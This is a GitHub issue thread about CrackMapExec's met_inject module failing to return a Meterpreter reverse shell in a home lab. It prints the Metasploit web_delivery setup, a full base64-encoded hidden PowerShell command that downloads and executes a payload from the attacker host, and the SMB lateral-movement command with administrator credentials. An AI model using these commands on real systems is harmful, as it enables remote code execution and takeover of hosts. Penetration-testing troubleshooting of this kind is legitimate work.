search

byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.25k stars 1.63k forks source link

Cracksmbexec module met_inject don't respond with a reverse shell #771

Open CustosClarus opened 1 year ago

CustosClarus commented 1 year ago

Describe the bug I have been trying very hard to make the met_inject module work, but it seems to be stuck half-way

To Reproduce Steps to reproduce the behavior:

msf6 > use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set paylod winInterrupt: use the 'exit' command to quit
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.99
lhost => 192.168.0.99
msf6 exploit(multi/script/web_delivery) > set lport 9999
lport => 9999
msf6 exploit(multi/script/web_delivery) > set srvport 8888
srvport => 8888

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created

[*] Started HTTPS reverse handler on https://192.168.0.99:9999
[*] Using URL: http://192.168.0.99:8888/SUcwAh619w
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABzADMARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAcwAzAEYAdQBsAGwAKQB7ACQAcwAzAEYALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABzADMARgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AH0AOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AOQA5ADoAOAA4ADgAOAAvAFMAVQBjAHcAQQBoADYAMQA5AHcALwBCAFEAbABwAGUAegBjADkAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AOQA5ADoAOAA4ADgAOAAvAFMAVQBjAHcAQQBoADYAMQA5AHcAJwApACkAOwA=

2.

└─$ crackmapexec smb 192.168.0.100 -u 'administrator' -p '1qaz2wsxZZ' -d hacklab.local -M met_inject -o SRVHOST=192.168.0.99 SRVPORT=8888 RAND=SUcwAh619w SSL=http

SMB         192.168.0.100   445    HACKLAB-DC       [*] Windows Server 2016 Datacenter Evaluation 14393 x64 (name:HACKLAB-DC) (domain:hacklab.local) (signing:True) (SMBv1:True)
SMB         192.168.0.100   445    HACKLAB-DC       [+] hacklab.local\administrator:1qaz213ddfdwsxZZ (Pwn3d!)
MET_INJE... 192.168.0.100   445    HACKLAB-DC       [+] Executed payl
  1. See error [*] 192.168.0.100 web_delivery - Delivering Payload (4161 bytes)

Expected behavior

Meterpreter shell.

Screenshots Alt text Alt text Alt text

Crackmapexec info

Marshall-Hallenbeck commented 1 year ago

Is it being caught by AV? I was just using this module last week and it worked fine.